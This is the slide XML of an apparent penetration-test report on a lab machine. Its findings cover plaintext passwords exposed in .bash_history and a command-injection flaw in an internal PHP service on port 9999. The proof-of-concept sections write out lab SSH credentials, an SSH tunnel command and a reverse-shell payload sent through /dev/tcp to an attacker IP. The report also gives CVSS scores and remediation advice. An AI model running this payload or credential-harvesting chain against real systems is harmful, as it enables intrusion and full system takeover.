              <a:t>Proof of Concept (PoC):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>After SSH login as jehad, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>Run: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" i="1" dirty="0"/>
              <a:t>cat ~/.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" i="1" dirty="0" err="1"/>
              <a:t>bash_history</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>Output includes: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Passwords (e.g., for user </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" i="1" dirty="0" err="1"/>
              <a:t>losy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>) URLs and local web port access info Reverse shell payloads</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0"/>
              <a:t>Process Analysis:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Gained SSH access as jehad via compromised credentials.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Accessed </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" i="1" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" i="1" dirty="0" err="1"/>
              <a:t>bash_history</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" i="1" dirty="0"/>
              <a:t>cat ~/.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" i="1" dirty="0" err="1"/>
              <a:t>bash_history</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" i="1" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Discovered </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>Discovered</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>losy's</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t> password (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" i="1" dirty="0"/>
              <a:t>gang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>), Identified internal web service (port 9999), and internal URLs.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Used this information to continue privilege escalation.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="227743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40F8-9BC5-D896-AA61-559CD7AD88C7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066800" y="256033"/>
            <a:ext cx="10058400" cy="549038"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>Vulnerability Summery</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="3600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{097AF0B9-6E02-E6F6-3F57-1AC03D863612}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="258763" y="864787"/>
            <a:ext cx="11628437" cy="5247489"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2429924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A6F95-A10D-2BAF-0A3D-2775FEDEF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4E10B1-874F-F398-2C41-E4CA187EF08A}"/>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548744FF-6985-B1A8-3ABC-44C8E034693A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="258417" y="805071"/>
            <a:ext cx="6599583" cy="5367129"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>Steps to Reproduce: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Authenticate via SSH:                                                                  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>ssh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>jehad@192.168.139.143 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>                                     #</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Password: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>fool  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Check bash history: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0"/>
              <a:t>cat /home/jehad/.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0" err="1"/>
              <a:t>bash_history</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0"/>
              <a:t>cat /home/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0" err="1"/>
              <a:t>losy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0"/>
              <a:t>/.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0" err="1"/>
              <a:t>bash_history</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Observe exposed credentials and commands</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>Impact</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>Credential Chain Compromise: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Disclosed plaintext password of another user (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0" err="1"/>
              <a:t>losy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>) Led to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0" err="1"/>
              <a:t>losy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0"/>
              <a:t> → root escalation.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>Service Exploitation: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Enabled RCE via internal web service Revealed web commands and local ports used by applications.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Exposed attacker command history (e.g., reverse shell payloads), reducing effort for re-exploitation.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Enabled further escalation and post-exploitation steps.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{86A8C28A-59CA-062E-BE70-913D2139EB9E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6806143" y="533816"/>
            <a:ext cx="4997447" cy="2895184"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:glow rad="139700">
              <a:schemeClr val="accent3">
                <a:satMod val="175000"/>
                <a:alpha val="40000"/>
              </a:schemeClr>
            </a:glow>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{62C73384-A540-611E-9AEF-C6A54A7D6077}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7567577" y="3845339"/>
            <a:ext cx="3494456" cy="2061287"/>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2538475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0064-9266-EF6B-EBD2-DE4B408FA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E09210-F233-D833-AB9E-A3D52BBE8781}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066800" y="256033"/>
            <a:ext cx="10058400" cy="549038"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="3600" dirty="0"/>
              <a:t>Exposed Internal Web Service on Port 9999</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F7E5B2F2-1B7C-C5F4-9B57-EA5F07B1E85B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="251791" y="864707"/>
            <a:ext cx="11688417" cy="5367129"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>Vulnerability Name: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Internal Service Exposure with Command Execution</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>Vulnerability Description: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>An internal web service was discovered running on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0"/>
              <a:t>localhost:9999. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>This service was not exposed externally, but accessed it by creating an SSH tunnel after logging in with reused credentials. The service was vulnerable to remote command execution (RCE) via a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0" err="1"/>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> parameter in the index. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0" err="1"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> file, leading to a reverse shell and complete compromise of the system.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0"/>
              <a:t>Affected Machine, URL &amp; Parameter: URL:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://127.0.0.1:9999/index.php?cmd= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0"/>
              <a:t>Parameter:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" i="1" dirty="0" err="1"/>
              <a:t>cmd</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="1800" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0"/>
              <a:t>Severity: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" i="1" dirty="0"/>
              <a:t>High</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Network-accessible (AV:N) command injection flaw allows full system takeover (C:H/I:H/A:H) with low complexity (AC:L), though requiring initial access credentials (PR:L). This creates critical post-compromise impact.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>Risk /Impact:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Remote command execution enabled attackers to run arbitrary system commands.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attackers could escalate privileges, gain persistence, or exfiltrate sensitive data.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Led to full system takeover via reverse shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0"/>
              <a:t>Recommendation:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1750" dirty="0"/>
              <a:t>Do not expose internal services without authentication or access control.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1750" dirty="0"/>
              <a:t>Implement strict input validation and disable command injection vectors.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1750" dirty="0"/>
              <a:t>Restrict internal services using firewall rules or bind them to secure interfaces.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1750" dirty="0"/>
              <a:t>Audit code for insecure functions like </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1750" i="1" dirty="0"/>
              <a:t>system() </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1750" dirty="0"/>
              <a:t>or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1750" i="1" dirty="0"/>
              <a:t>exec()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1750" dirty="0"/>
              <a:t> used with user input.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="1750" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1260535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476D8-6307-2537-3FBB-DED35C9E4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037FA-AA62-0E4E-FCA6-78BCE4AED1EF}"/>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1C860862-714D-E1AC-503F-0748037AC7D7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="258418" y="805071"/>
            <a:ext cx="7692886" cy="5367129"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0"/>
              <a:t>CVSS Score: 8.8 (High)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0"/>
              <a:t>CVSS Vector String: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1550" b="1" dirty="0"/>
              <a:t>(CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="1550" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0"/>
              <a:t>Proof of Concept (PoC):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Create SSH tunnel: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>ssh -L 9999:127.0.0.1:9999 jehad@192.168.139.143</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>In browser, access: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://127.0.0.1:9999/index.php?cmd=id</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>For reverse shell: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://127.0.0.1:9999/index.php?cmd=bash -c 'bash -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> &gt;&amp; /dev/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/192.168.139.139/9001 0&gt;&amp;1’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>Process Analysis:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attacker gained SSH access using leaked credentials.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Identified </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1"/>
              <a:t>bash_history</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>entry showing traffic to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>localhost:9999.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Used SSH port forwarding to access the service externally.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Discovered </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1"/>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> parameter allowed command execution.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
